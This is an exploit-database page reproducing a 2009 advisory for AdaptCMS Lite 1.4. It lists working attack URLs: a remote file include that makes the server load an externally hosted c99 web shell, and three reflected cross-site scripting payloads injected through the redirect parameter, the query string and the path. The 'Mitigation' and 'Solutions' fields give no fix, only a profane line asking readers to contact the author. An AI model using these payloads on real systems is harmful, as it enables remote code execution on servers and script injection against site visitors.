header-logo
Suggest Exploit
vendor:
AdaptCMS Lite
by:
RoMaNcYxHaCkEr
8.8
CVSS
HIGH
Remote File Include, Remote XSS
94, 79
CWE
Product Name: AdaptCMS Lite
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:adaptcms:adaptcms_lite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AdaptCMS Lite 1,4 Multiple Vulnes ( Remote File Include , Remote XSS )

AdaptCMS Lite 1.4 is vulnerable to Remote File Include and Remote XSS. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the vulnerable application. The Remote File Include vulnerability can be exploited by sending a maliciously crafted URL to the vulnerable application. The Remote XSS vulnerability can be exploited by sending a maliciously crafted URL to the vulnerable application. The Cross Site Scripting in URI and path can be exploited by sending a maliciously crafted URL to the vulnerable application.

Mitigation:

Contact With Me I Will Declear All This Fucking Functions
Source

Exploit-DB raw data:

# AdaptCMS Lite 1,4 Multiple Vulnes ( Remote File Include ,  Remote XSS )

# Free Download : http://213.203.218.125/a/ad/adaptcms/AdaptCMS_Lite_1.4.zip

# Or : http://www.adaptcms.com/

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote File Include :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.sec-code.com/c99.txt?

# Exploit [2]:

- Remote XSS :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?view=redirect&url=javascript:alert(413528022209)

Cross Site Scripting in URI :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?acuparam=>'><ScRiPt>alert(435038069432)</ScRiPt>

Cross Site Scripting in path :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/?=>"'><ScRiPt>alert(438948070551)</ScRiPt>

# Solutions :

Contact With Me I Will Declear All This Fucking Functions

# rXh

# bEST wISHES

# milw0rm.com [2009-02-09]

Navigation

Suggest Exploit

Services By CQR